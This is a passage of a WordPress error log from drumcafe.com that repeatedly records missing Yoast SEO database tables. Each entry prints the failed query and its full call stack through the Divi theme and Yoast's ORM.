Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> IN ('post') AND <code>author_id</code> = '1' AND <code>is_public</code> = '1' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Author_Builder->build, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_public_posts, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_a_public_post, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> IN ('post') AND <code>author_id</code> = '1' AND <code>is_public</code> = '1' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Author_Builder->build, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_public_posts, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_a_public_post, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> IN ('post') AND <code>author_id</code> = '1' AND <code>is_public</code> IS NULL LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Author_Builder->build, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_public_posts, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_a_post_with_is_public_null, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable_hierarchy' doesn't exist for query DELETE FROM <code>wp_tz3c246s0h_yoast_indexable_hierarchy</code> WHERE <code>indexable_id</code> = '0' made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Hierarchy_Builder->build, Yoast\WP\SEO\Repositories\Indexable_Hierarchy_Repository->clear_ancestors, Yoast\WP\Lib\ORM->delete_many, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> IN ('post') AND <code>author_id</code> = '1' AND <code>is_public</code> IS NULL LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Author_Builder->build, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_public_posts, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_a_post_with_is_public_null, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> IN ('post') AND <code>author_id</code> = '1' AND <code>is_public</code> = '1' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Author_Builder->build, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_public_posts, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_a_public_post, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_id</code>, <code>object_type</code>, <code>permalink</code>, <code>title</code>, <code>description</code>, <code>is_cornerstone</code>, <code>is_robots_noindex</code>, <code>is_robots_nofollow</code>, <code>is_robots_noarchive</code>, <code>is_robots_noimageindex</code>, <code>is_robots_nosnippet</code>, <code>is_public</code>, <code>has_public_posts</code>, <code>blog_id</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_image_source</code>, <code>open_graph_image_meta</code>, <code>twitter_image</code>, <code>twitter_image_id</code>, <code>twitter_image_source</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('1', 'user', 'https://www.drumcafe.com/author/drumcafe/', NULL, NULL, '0', '0', NULL, NULL, NULL, NULL, NULL, '0', '1', 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', NULL, 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', '41:cd80de8e2e6d3ce7e7ee2d7c9d9ebcaf', '2020-11-20 21:01:38', '2020-11-20 21:01:38') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> IN ('post') AND <code>author_id</code> = '1' AND <code>is_public</code> IS NULL LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Author_Builder->build, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_public_posts, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_a_post_with_is_public_null, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_id</code>, <code>object_type</code>, <code>object_sub_type</code>, <code>permalink</code>, <code>primary_focus_keyword_score</code>, <code>readability_score</code>, <code>is_cornerstone</code>, <code>is_robots_noindex</code>, <code>is_robots_nofollow</code>, <code>is_robots_noimageindex</code>, <code>is_robots_noarchive</code>, <code>is_robots_nosnippet</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_image_source</code>, <code>open_graph_image_meta</code>, <code>twitter_image</code>, <code>twitter_image_id</code>, <code>twitter_image_source</code>, <code>primary_focus_keyword</code>, <code>canonical</code>, <code>title</code>, <code>description</code>, <code>breadcrumb_title</code>, <code>open_graph_title</code>, <code>open_graph_description</code>, <code>twitter_title</code>, <code>twitter_description</code>, <code>author_id</code>, <code>post_parent</code>, <code>number_of_pages</code>, <code>post_status</code>, <code>is_protected</code>, <code>is_public</code>, <code>has_public_posts</code>, <code>blog_id</code>, <code>schema_page_type</code>, <code>schema_article_type</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('1447', 'post', 'page', 'https://www.drumcafe.com/conferences/', NULL, '30', '0', NULL, '0', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Conferences', NULL, NULL, NULL, NULL, '1', '0', NULL, 'publish', '0', NULL, NULL, '1', NULL, NULL, '37:97a880684a30ae9f40cedae4cc6f7f4a', '2020-11-20 21:01:38', '2020-11-20 21:01:38') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'home-page' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Presenters\Schema_Presenter->present, Yoast\WP\SEO\Presenters\Schema_Presenter->get, Yoast\WP\SEO\Presentations\Abstract_Presentation->__get, Yoast\WP\SEO\Presentations\Indexable_Presentation->generate_schema, Yoast\WP\SEO\Generators\Schema_Generator->generate, Yoast\WP\SEO\Generators\Schema\Website->generate, Yoast\WP\SEO\Presentations\Abstract_Presentation->__get, Yoast\WP\SEO\Context\Meta_Tags_Context->generate_site_url, Yoast\WP\SEO\Repositories\Indexable_Repository->find_for_home_page, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> IN ('post') AND <code>author_id</code> = '1' AND <code>is_public</code> IS NULL LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Author_Builder->build, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_public_posts, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_a_post_with_is_public_null, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable_hierarchy' doesn't exist for query SELECT <code>indexable_id</code> FROM <code>wp_tz3c246s0h_yoast_indexable_hierarchy</code> WHERE <code>ancestor_id</code> = '0' made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Ancestor_Watcher->reset_children, Yoast\WP\SEO\Repositories\Indexable_Hierarchy_Repository->find_children, Yoast\WP\Lib\ORM->find_array, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'home-page' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Presenters\Schema_Presenter->present, Yoast\WP\SEO\Presenters\Schema_Presenter->get, Yoast\WP\SEO\Presentations\Abstract_Presentation->__get, Yoast\WP\SEO\Presentations\Indexable_Presentation->generate_schema, Yoast\WP\SEO\Generators\Schema_Generator->generate, Yoast\WP\SEO\Generators\Schema\Website->generate, Yoast\WP\SEO\Presentations\Abstract_Presentation->__get, Yoast\WP\SEO\Context\Meta_Tags_Context->generate_site_url, Yoast\WP\SEO\Repositories\Indexable_Repository->find_for_home_page, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_id</code>, <code>object_type</code>, <code>permalink</code>, <code>title</code>, <code>description</code>, <code>is_cornerstone</code>, <code>is_robots_noindex</code>, <code>is_robots_nofollow</code>, <code>is_robots_noarchive</code>, <code>is_robots_noimageindex</code>, <code>is_robots_nosnippet</code>, <code>is_public</code>, <code>has_public_posts</code>, <code>blog_id</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_image_source</code>, <code>open_graph_image_meta</code>, <code>twitter_image</code>, <code>twitter_image_id</code>, <code>twitter_image_source</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('1', 'user', 'https://www.drumcafe.com/author/drumcafe/', NULL, NULL, '0', '0', NULL, NULL, NULL, NULL, NULL, '0', '1', 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', NULL, 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', '41:cd80de8e2e6d3ce7e7ee2d7c9d9ebcaf', '2020-11-20 21:01:38', '2020-11-20 21:01:38') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:38 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable_hierarchy' doesn't exist for query SELECT <code>indexable_id</code> FROM <code>wp_tz3c246s0h_yoast_indexable_hierarchy</code> WHERE <code>ancestor_id</code> = '0' made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Ancestor_Watcher->reset_children, Yoast\WP\SEO\Repositories\Indexable_Hierarchy_Repository->find_children, Yoast\WP\Lib\ORM->find_array, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_type</code>, <code>title</code>, <code>breadcrumb_title</code>, <code>permalink</code>, <code>blog_id</code>, <code>description</code>, <code>is_robots_noindex</code>, <code>open_graph_title</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_description</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('home-page', '%%sitename%% %%page%% %%sep%% %%sitedesc%%', 'Home', 'https://www.drumcafe.com/', '1', 'Team Building, Interactive drumming entertainment, Gumboot Dancers, Boomwhackers, Conferences', '0', '', '', '', '', '25:dff44bb0d640440bdfa4424e0ab6f800', '2020-11-20 21:01:38', '2020-11-20 21:01:38') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Presenters\Schema_Presenter->present, Yoast\WP\SEO\Presenters\Schema_Presenter->get, Yoast\WP\SEO\Presentations\Abstract_Presentation->__get, Yoast\WP\SEO\Presentations\Indexable_Presentation->generate_schema, Yoast\WP\SEO\Generators\Schema_Generator->generate, Yoast\WP\SEO\Generators\Schema\Website->generate, Yoast\WP\SEO\Presentations\Abstract_Presentation->__get, 